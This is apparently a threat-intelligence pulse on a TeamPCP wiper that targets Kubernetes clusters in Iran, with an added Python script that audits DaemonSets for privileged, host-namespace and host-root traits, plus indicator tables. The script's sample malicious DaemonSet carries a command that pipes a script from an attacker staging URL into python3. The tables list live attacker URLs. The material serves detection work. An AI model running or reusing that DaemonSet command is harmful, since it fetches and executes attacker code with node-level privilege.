CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran
Description
A new payload in the TeamPCP arsenal has been discovered that is capable of wiping entire Kubernetes clusters. The script uses the same ICP canister as the CanisterWorm campaign and the same lateral movement via DaemonSets, but this variant introduces a geopolitically targeted destructive payload aimed specifically at Iranian systems. The malware checks the timezone and locale to identify Iranian systems and deploys privileged DaemonSets to every node in the Kubernetes environment: Iranian nodes are wiped and force-rebooted, while non-Iranian nodes receive the CanisterWorm backdoor. The latest variant also adds network-based lateral movement, exploiting exposed Docker APIs and spreading over SSH. This development shows TeamPCP's ability to operate at supply-chain scale and its willingness to engage in destructive actions.
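The behaviour described above (privileged DaemonSets pushed to every node, payloads fetched from the listed staging hosts) is something a defender can audit for directly. The following is an added example, not code from the Aikido or AlienVault report: it walks DaemonSet objects in the shape returned by `kubectl get daemonsets -A -o json` (an assumption about the input format) and flags the traits a wiper or worm DaemonSet needs: privileged containers, host PID/network namespaces, a host-root `hostPath` mount, and references to the domains listed in this pulse's indicators. The sample DaemonSets below are constructed for the example.

```python
"""Audit Kubernetes DaemonSet specs for the traits described in this pulse."""
from typing import Any

# Domains taken from the Indicators of Compromise on this page.
SUSPICIOUS_DOMAINS = sorted({
    "championships-peoples-point-cassette.trycloudflare.com",
    "investigation-launches-hearings-copying.trycloudflare.com",
    "souls-entire-defined-routes.trycloudflare.com",
    "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io",
})

# Constructed sample, shaped like the "items" array of `kubectl get ds -A -o json`.
# One benign log shipper and one hypothetical malicious DaemonSet.
SAMPLE_DAEMONSETS: list[dict[str, Any]] = [
    {
        "metadata": {"name": "log-shipper", "namespace": "logging"},
        "spec": {"template": {"spec": {
            "containers": [{
                "name": "fluentd", "image": "fluentd:1.16",
                "securityContext": {"runAsNonRoot": True},
            }],
            "volumes": [{"name": "logs", "hostPath": {"path": "/var/log"}}],
        }}},
    },
    {
        "metadata": {"name": "kube-sync", "namespace": "kube-system"},
        "spec": {"template": {"spec": {
            "hostPID": True,
            "hostNetwork": True,
            "containers": [{
                "name": "sync", "image": "alpine:3.19",
                "securityContext": {"privileged": True},
                "command": ["sh", "-c"],
                "args": ["curl -fsSL https://souls-entire-defined-routes.trycloudflare.com/kube.py | python3"],
            }],
            "volumes": [{"name": "host", "hostPath": {"path": "/"}}],
        }}},
    },
]


def daemonset_findings(ds: dict[str, Any]) -> list[str]:
    """Return a list of human-readable findings for one DaemonSet object."""
    findings: list[str] = []
    pod = ds.get("spec", {}).get("template", {}).get("spec", {})

    # Host namespaces give a pod visibility into, and control over, the node.
    if pod.get("hostPID"):
        findings.append("hostPID enabled")
    if pod.get("hostNetwork"):
        findings.append("hostNetwork enabled")

    # A hostPath of "/" exposes the whole node filesystem (what a wiper needs).
    for vol in pod.get("volumes", []):
        path = vol.get("hostPath", {}).get("path")
        if path == "/":
            findings.append(f"volume '{vol.get('name')}' mounts host root path /")

    # Privileged containers and command lines that pull from known staging hosts.
    for c in pod.get("containers", []) + pod.get("initContainers", []):
        name = c.get("name", "<unnamed>")
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"container '{name}' runs privileged")
        cmdline = " ".join(c.get("command", []) + c.get("args", []))
        for domain in SUSPICIOUS_DOMAINS:
            if domain in cmdline:
                findings.append(f"container '{name}' references known staging host {domain}")
    return findings


def audit(items: list[dict[str, Any]]) -> dict[str, list[str]]:
    """Map 'namespace/name' to findings for every DaemonSet that has any."""
    report: dict[str, list[str]] = {}
    for ds in items:
        meta = ds.get("metadata", {})
        key = f"{meta.get('namespace', 'default')}/{meta.get('name', '<unnamed>')}"
        findings = daemonset_findings(ds)
        if findings:
            report[key] = findings
    return report


if __name__ == "__main__":
    for key, findings in audit(SAMPLE_DAEMONSETS).items():
        print(key)
        for f in findings:
            print("  -", f)
```

Run it against a live cluster by feeding `json.load(...)["items"]` from `kubectl get daemonsets -A -o json` into `audit()`. A benign hostPath mount such as `/var/log` is deliberately not flagged; only the host root mount, host namespaces, privilege and the page's staging domains raise findings, which keeps the output small enough to review by hand.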
Technical Details
- Author: AlienVault
- TLP: white
- References: https://www.aikido.dev/blog/teampcp-stage-payload-canisterworm-iran
- Adversary: TeamPCP
- Pulse Id: 69c26c92be4a06388a97f328
- Threat Score: null
Indicators of Compromise
URL
| Value | Description |
|---|---|
| https://championships-peoples-point-cassette.trycloudflare.com/prop.py | — |
| https://souls-entire-defined-routes.trycloudflare.com/kamikaze.sh | — |
| https://souls-entire-defined-routes.trycloudflare.com/kube.py | — |
Domain
| Value | Description |
|---|---|
| championships-peoples-point-cassette.trycloudflare.com | — |
| investigation-launches-hearings-copying.trycloudflare.com | — |
| souls-entire-defined-routes.trycloudflare.com | — |
| tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io | — |
Threat ID: 69c27268f4197a8e3b26b87f
Added to database: 3/24/2026, 11:15:52 AM
Last updated: 3/24/2026, 11:16:02 AM